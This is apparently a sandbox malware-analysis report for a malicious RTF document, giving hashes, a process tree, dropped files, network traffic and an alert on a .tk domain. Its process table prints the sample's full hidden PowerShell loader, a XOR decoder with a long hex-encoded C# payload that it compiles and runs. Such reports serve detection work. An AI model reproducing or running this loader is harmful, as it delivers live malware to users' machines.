File name: | Unconfirmed 367264.crdownload |
Full analysis: | https://app.any.run/tasks/f2bc43b2-42c6-498b-95eb-2ca18f23bcba |
Verdict: | Malicious activity |
Analysis date: | September 18, 2019, 19:08:24 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | text/rtf |
File info: | Rich Text Format data, version 1, unknown character set |
MD5: | 9925AAE2E5BD9954D132E8C72AD44E58 |
SHA1: | 28824B6FA1C3A98271348294304F9C0B414C39F8 |
SHA256: | 4CA5872ADA793C013ADB0025ABFF3CA7D07345F0A52F93CCD24C474E54792324 |
SSDEEP: | 3072:oHdXciMyH6vS64XciMyH6vS64XciMyH6vS64XciMyH6vS64XciMyH6vS64XciMyi:qhoohoohoohoohoohoohoyS |
.rtf | | | Rich Text Format (100) |
---|
InternalVersionNumber: | 57435 |
---|---|
CharactersWithSpaces: | 4 |
Characters: | 4 |
Words: | - |
Pages: | 1 |
TotalEditTime: | - |
RevisionNumber: | 1 |
ModifyDate: | 2019:01:07 23:54:00 |
CreateDate: | 2019:01:07 23:54:00 |
LastModifiedBy: | Admin |
Author: | Admin |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3436 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Unconfirmed 367264.crdownload.rtf" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
2520 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -Embedding | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | svchost.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Exit code: 0 Version: 14.0.6024.1000 | ||||
2400 | powershell -WindowStyle Hidden function oad4c4 { param($qa89651) $se84a8 = 'm888a2';$zae81 = ''; for ($i = 0; $i -lt $qa89651.length; $i+=2) { $e176d3 = [convert]::ToByte($qa89651.Substring($i, 2), 16); $zae81 += [char]($e176d3 -bxor $se84a8[($i / 2) % $se84a8.length]); } return $zae81; } $c275a7 = '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'; $c275a72 = oad4c4($c275a7); Add-Type -TypeDefinition $c275a72; [x614cae]::uc6579(); | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | wmiprvse.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2052 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -Embedding | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | svchost.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Exit code: 0 Version: 14.0.6024.1000 | ||||
2228 | "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\tl6fa_gt.cmdline" | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | powershell.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Visual C# Command Line Compiler Exit code: 0 Version: 8.0.50727.4927 (NetFXspW7.050727-4900) | ||||
2372 | powershell -WindowStyle Hidden function oad4c4 { param($qa89651) $se84a8 = 'm888a2';$zae81 = ''; for ($i = 0; $i -lt $qa89651.length; $i+=2) { $e176d3 = [convert]::ToByte($qa89651.Substring($i, 2), 16); $zae81 += [char]($e176d3 -bxor $se84a8[($i / 2) % $se84a8.length]); } return $zae81; } $c275a7 = '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'; $c275a72 = oad4c4($c275a7); Add-Type -TypeDefinition $c275a72; [x614cae]::uc6579(); | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | wmiprvse.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3244 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -Embedding | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | svchost.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Exit code: 0 Version: 14.0.6024.1000 | ||||
3504 | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\admin\AppData\Local\Temp\RESAF31.tmp" "c:\Users\admin\AppData\Local\Temp\CSCAF30.tmp" | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe | — | csc.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft® Resource File To COFF Object Conversion Utility Exit code: 0 Version: 8.00.50727.4940 (Win7SP1.050727-5400) | ||||
3896 | powershell -WindowStyle Hidden function oad4c4 { param($qa89651) $se84a8 = 'm888a2';$zae81 = ''; for ($i = 0; $i -lt $qa89651.length; $i+=2) { $e176d3 = [convert]::ToByte($qa89651.Substring($i, 2), 16); $zae81 += [char]($e176d3 -bxor $se84a8[($i / 2) % $se84a8.length]); } return $zae81; } $c275a7 = '184b515606123e414b4c045f564d4b510f554d6b414b155700166a4d0f4604555d16285c195d4a571161084a4e5102571e034d4b085c0a186b4112460855167c08530a56574b155b0e4b034d125b035f186b1841195d5516287d564d4b510f554d6b414b15570016765d15096032484d035e045b185b0d531e4b18405703595b595d1a69295454710c42024a4c104359084a565d0d015f1a147d0f461f416857085c19051a7f04463d4a575b2056094a5d4b121044651848145001515b1812460c4c515b4157154c5d4a0f1224564c6815404d4a5a0f56004571564c31461f18520f00010b0e144b154004565f1806545b590d01561b56637c540d7b0048574a151a4f535d4a0f57010b0a1a4d1228564c4a18620251564c410f4d1a7457005621515a4a0040141a11654142185a545102121e4c594c08514d5d404c0440031871561562194a184e530a5e01104b154004565f1814560c0e0001001b56637c540d7b0048574a151a4f535d4a0f57010b0a1a4d1228564c4a18620251564c5c103b514a4c145301684a5715570e4c1a113c121d4d5a5408514d4b4c59155b0e185d4015571f56185a0e5d01185d0d04535a5d10710f463d4c4a180c03555d0c5d4d6724564c6815404d52090b590141184d510f464d525b0105010814185714464d4d51561512010a5b0b030a4403637c0d5e245548571346451a735d135c08540b0a4f5601541a144177034c4a41315d04564c054360195475571757205d5557134b4f14186b044621594b4c24401f574a050753014b5d113c121e4c594c08514d5d404c044003184e5708564d555c5a04564571564c31461f185c0f00060b0c5e14285c19684c4a41405c090c0d4d5b034c185952510c5c5e115a42185a545102121e4c594c08514d51564c41470e0e0d0f581a444371561562194a18560704585c0f0d410f4d4e0a00520b4557595c555159101a080207580c5a0d50060b0d0e085007591a11115a5b0b10565e5707090f0d055c7b034c684c131c375d4a5748490a574c5741510e0a5d095a4f24564c6815404d400a5c0503504a5a0f560045565e0e54565a0d14570056595b0c1043000e0d0d0c03075c0b0a0d50020e0d0e0f000609080f0d5502550c591a481b56515e101900095c09055c7b034c684c131c375d4a5748490a574c574151
0e0a5d095a4f3871564c31461f18565a53575905106d285c19684c4a4807564d515615121e005d5d02040e050803085445195d0d04535a5d10405356090914560300080c140819065d14574d15121e005d5d02040e111143065d1957185b020008090345234b195d6365415955590a0053065043084052034108405e071e5d4001081c0924564c6815404d555e01530b54057559134105595416205e01575b70265e025a5954490144037559134105595416225d1d41105359535f000a0c4d0241555e01530b54140b115a5f095a5d5c495c084f18710f463d4c4a101900095c0916355d24564c0e551a4413084051025c5a11140c54540a01014d0144035b5b53575c02186f04502e54515d0f464d425c00520150565d4f4165085a7b540857034c10115a41194a51560612140b5d0e580358057d56175b1f575655045c19167f5d157402545c5d13620c4c5010245c1b514a570f5f08564c163242085b51590d7402545c5d131c2c48485408510c4c51570f760c4c59114a1031644d0a040a081a13570056595b0c1043065e0d5c0c5107091a11031b56550b0b16255d1a56545700562b51545d495d0c5c0c5b551a4f080d0c02060e0c000d0303090c0a0c02075d0d090953030b085b0800020c090e095407540c0a0d5007580d010857075a0c0a0d56070e0d0f0c07075a090d0d05104414410b040454090d115a621f575b5d12413e4c594a157b035e57181206585e59050f571a18684a0e51084b4b6b15531f4c7156075d45410b5d570b5c0d11033140025b5d4b121c3e4c594a151a1e0c0d5e001b564a5d4c1440031808031c42185a545102121e4c594c08514d4b4c4a085c0a18575905060e0c104b154004565f181b005a010c111a41194a51560612070f590b0704501a5500590a0c0a1a0312461f51565f41445f000b015c61194a5156061c2855484c18090b574a10085c1918510551090404420a560b5916745d0f55195003514a0f5f11435a184608184a5a56055f057b570f44084a4c16355d2f414c5d49485f0f010c4f61185a4b4c135b035f10514d004414090e48091b0a000b581950105b50004044104a5a56055f1866180b050c0b5e0e3a1a04170a1141174d520f5952545b16745d0f55195065115a4f1f5d4c4d135c4d4e0a00520b564545'; $c275a72 = oad4c4($c275a7); Add-Type -TypeDefinition $c275a72; [x614cae]::uc6579(); | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | wmiprvse.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2704 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -Embedding | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | svchost.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Exit code: 0 Version: 14.0.6024.1000 |
PID | Process | Filename | Type | |
---|---|---|---|---|
3436 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR9CB2.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2520 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVRA472.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2052 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVRAB29.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2400 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\VMLZC941EL7W7FCKY09R.temp | — | |
MD5:— | SHA256:— | |||
3244 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVRAEB3.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2228 | csc.exe | C:\Users\admin\AppData\Local\Temp\CSCAF30.tmp | — | |
MD5:— | SHA256:— | |||
3504 | cvtres.exe | C:\Users\admin\AppData\Local\Temp\RESAF31.tmp | — | |
MD5:— | SHA256:— | |||
2228 | csc.exe | C:\Users\admin\AppData\Local\Temp\tl6fa_gt.out | — | |
MD5:— | SHA256:— | |||
2372 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\KWXJLPI3G36A6WGS7DMV.temp | — | |
MD5:— | SHA256:— | |||
2704 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVRB2CA.tmp.cvr | — | |
MD5:— | SHA256:— |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2484 | iexplore.exe | GET | 301 | 2.16.186.27:80 | http://shell.windows.com/fileassoc/fileassoc.asp?Ext=DS_Store | unknown | — | — | whitelisted |
2484 | iexplore.exe | GET | 200 | 2.16.106.233:80 | http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab | unknown | compressed | 57.0 Kb | whitelisted |
3916 | iexplore.exe | GET | 200 | 204.79.197.200:80 | http://www.bing.com/favicon.ico | US | image | 237 b | whitelisted |
2484 | iexplore.exe | GET | 200 | 2.16.106.233:80 | http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/47BEABC922EAE80E78783462A79F45C254FDE68B.crt | unknown | der | 969 b | whitelisted |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3916 | iexplore.exe | 204.79.197.200:80 | www.bing.com | Microsoft Corporation | US | whitelisted |
3916 | iexplore.exe | 204.79.197.200:443 | www.bing.com | Microsoft Corporation | US | whitelisted |
2484 | iexplore.exe | 40.90.23.153:443 | login.live.com | Microsoft Corporation | US | unknown |
2484 | iexplore.exe | 2.19.38.59:80 | go.microsoft.com | Akamai International B.V. | — | whitelisted |
2484 | iexplore.exe | 204.79.197.200:443 | www.bing.com | Microsoft Corporation | US | whitelisted |
2484 | iexplore.exe | 2.16.186.27:80 | shell.windows.com | Akamai International B.V. | — | whitelisted |
2484 | iexplore.exe | 172.217.16.138:443 | ajax.googleapis.com | Google Inc. | US | whitelisted |
2484 | iexplore.exe | 66.39.64.146:443 | file.org | pair Networks | US | malicious |
2484 | iexplore.exe | 52.164.210.24:443 | consent.cookiebot.com | Microsoft Corporation | IE | whitelisted |
2484 | iexplore.exe | 216.58.206.10:443 | fonts.googleapis.com | Google Inc. | US | whitelisted |
Domain | IP | Reputation |
---|---|---|
this-a22.tk | | suspicious |
www.bing.com | | whitelisted |
go.microsoft.com | | whitelisted |
shell.windows.com | | whitelisted |
login.live.com | | whitelisted |
file.org | | whitelisted |
fonts.googleapis.com | | whitelisted |
kcdn.file.org | | whitelisted |
maxcdn.bootstrapcdn.com | | whitelisted |
ajax.googleapis.com | | whitelisted |
PID | Process | Class | Message |
---|---|---|---|
— | — | Potentially Bad Traffic | ET DNS Query to a .tk domain - Likely Hostile |
Process | Message |
---|---|
csc.exe | *** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302 |
csc.exe | *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144 |
csc.exe | *** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302 |
csc.exe | *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144 |
csc.exe | *** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302 |
csc.exe | *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144 |
csc.exe | *** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302 |
csc.exe | *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144 |
csc.exe | *** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302 |
csc.exe | *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144 |